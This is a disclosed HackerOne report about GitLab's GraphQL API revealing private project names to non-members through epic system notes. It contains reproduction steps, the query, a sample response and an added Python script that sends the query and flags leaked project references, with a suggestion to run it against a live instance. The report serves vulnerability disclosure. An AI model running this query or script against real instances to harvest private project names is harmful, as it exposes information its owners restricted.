Private project names exposed in GraphiQL queries
HackerOne report #714386 by ashish_r_padelkar on 2019-10-15, assigned to @jeremymatos:
Summary
Hello,
I reported this as #640962, but it was a duplicate, and I see that the original has been marked as resolved. But there are still a few cases which disclose some info to unauthorised users.
Steps to reproduce
- Create a public group
- Create a private project underneath it
- Create an issue inside the private project
- Create 2 epics in the public group
- In the issue, apply EPIC1 to the issue. This should be done from the issue, i.e. apply the epic to the issue and not the other way round.
- Now change the epic from EPIC1 to EPIC2 within the issue itself.
- Now if you go to the epic and look at the timeline, you will see something like this
- If a non-member views the epic, they won't see this info in the UI as they are not a member.
- But using the GraphiQL query below, they can see this info, which reveals the private project name
Go to https://gitlab.com/-/graphql-explorer
query ($group_path: ID!) {
  group(fullPath: $group_path) {
    epic(iid: "1") {
      notes {
        edges {
          node {
            body
          }
        }
      }
    }
  }
}
Query Variables
{"group_path": "newgroup_1"}
The response would be like
{
"data": {
"group": {
"epic": {
"notes": {
"edges": [
{
"node": {
"body": "moved issue privateproject_1#2 to epic &2"
}
}
]
}
}
}
}
}
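The following script is an added example, not part of the original report or of GitLab's code. It builds the same GraphQL request the report describes (the query is parameterised on the epic iid rather than hard-coding "1") and then scans the returned epic notes for cross-project references such as `privateproject_1#2` that name a project the requester cannot see. The endpoint `https://gitlab.com/api/graphql`, the `PRIVATE-TOKEN` header, the regular expression for project references, the helper names, and the sample response are all assumptions made for this example; the sample response is constructed to match the shape shown in the report.

```python
"""Added example: reproduce the epic-notes query from the report and flag
note bodies that reference projects the requester is not allowed to see.

Nothing here is GitLab's own code. The endpoint, header, regex and sample
data are assumptions for illustration (see comments)."""
import json
import re
import urllib.request
from typing import Dict, Iterable, List, Set, Tuple

# Assumption: GitLab's GraphQL API endpoint (the GraphiQL explorer in the
# report sends its queries here).
GRAPHQL_ENDPOINT = "https://gitlab.com/api/graphql"

# Same query as in the report, with the epic iid passed as a variable.
EPIC_NOTES_QUERY = """
query ($group_path: ID!, $epic_iid: ID!) {
  group(fullPath: $group_path) {
    epic(iid: $epic_iid) {
      notes {
        edges {
          node {
            body
          }
        }
      }
    }
  }
}
"""

# Assumption: project references inside system notes look like
# "<project_path>#<issue_iid>", e.g. "privateproject_1#2" or
# "group/sub/project#12". Epic references ("&2") are deliberately not matched.
PROJECT_REF_RE = re.compile(
    r"(?<![\w/])([A-Za-z0-9_][\w.-]*(?:/[A-Za-z0-9_][\w.-]*)*)#(\d+)"
)


def build_request(group_path: str, epic_iid: str) -> Dict:
    """Return the JSON body for a POST to the GraphQL endpoint."""
    return {
        "query": EPIC_NOTES_QUERY,
        "variables": {"group_path": group_path, "epic_iid": epic_iid},
    }


def fetch_epic_notes(group_path: str, epic_iid: str, token: str = None,
                     endpoint: str = GRAPHQL_ENDPOINT) -> Dict:
    """Send the query. With token=None the request is unauthenticated, which is
    the non-member view the report is about (network call, not used in tests)."""
    payload = json.dumps(build_request(group_path, epic_iid)).encode()
    headers = {"Content-Type": "application/json"}
    if token:
        headers["PRIVATE-TOKEN"] = token  # assumption: GitLab personal access token header
    req = urllib.request.Request(endpoint, data=payload, headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


def note_bodies(response: Dict) -> List[str]:
    """Pull the note bodies out of the nested response, tolerating nulls."""
    group = (response.get("data") or {}).get("group") or {}
    epic = group.get("epic") or {}
    edges = (epic.get("notes") or {}).get("edges") or []
    return [e["node"]["body"] for e in edges
            if e.get("node") and e["node"].get("body")]


def project_refs_in_note(body: str) -> Set[str]:
    """Project paths referenced in one note body."""
    return {m.group(1) for m in PROJECT_REF_RE.finditer(body)}


def leaked_project_refs(response: Dict,
                        visible_projects: Iterable[str]) -> List[Tuple[str, str]]:
    """(project, note body) pairs where the note names a project that is not in
    the set of projects the requester can see. visible_projects must use the
    same form as the references in the notes (here: names relative to the group)."""
    visible = set(visible_projects)
    leaks = []
    for body in note_bodies(response):
        for project in sorted(project_refs_in_note(body)):
            if project not in visible:
                leaks.append((project, body))
    return leaks


# Constructed sample response mirroring the shape in the report.
SAMPLE_RESPONSE = {
    "data": {"group": {"epic": {"notes": {"edges": [
        {"node": {"body": "moved issue privateproject_1#2 to epic &2"}},
        {"node": {"body": "added issue publicproject_1#7"}},
        {"node": {"body": "changed title from **old** to **new**"}},
    ]}}}}
}

if __name__ == "__main__":
    # A non-member of newgroup_1 can only see the public project.
    for project, body in leaked_project_refs(SAMPLE_RESPONSE, {"publicproject_1"}):
        print(f"leak: {project!r} in note {body!r}")
```

Run it against a live instance by replacing `SAMPLE_RESPONSE` with `fetch_epic_notes("newgroup_1", "1")` (no token) and passing the set of project names that an unauthenticated user sees in the group's project list; any project name that appears in a system note but not in that list is information the UI would not have shown.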
Examples
You can use my example above. I have set the group to public and you won't see any private projects in it because you are not a member. However, using GraphQL, you will get the response I posted above, which reveals the private project name to you.
What is the current bug behavior?
Discloses private project name to unauthorised users
What is the expected correct behavior?
Authorised users should see the private project related info
Output of checks
This bug happens on GitLab.com and might be on omnibus installations too.
Regards,
Ashish
Impact
Discloses private project names to unauthorised users using GraphQL
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
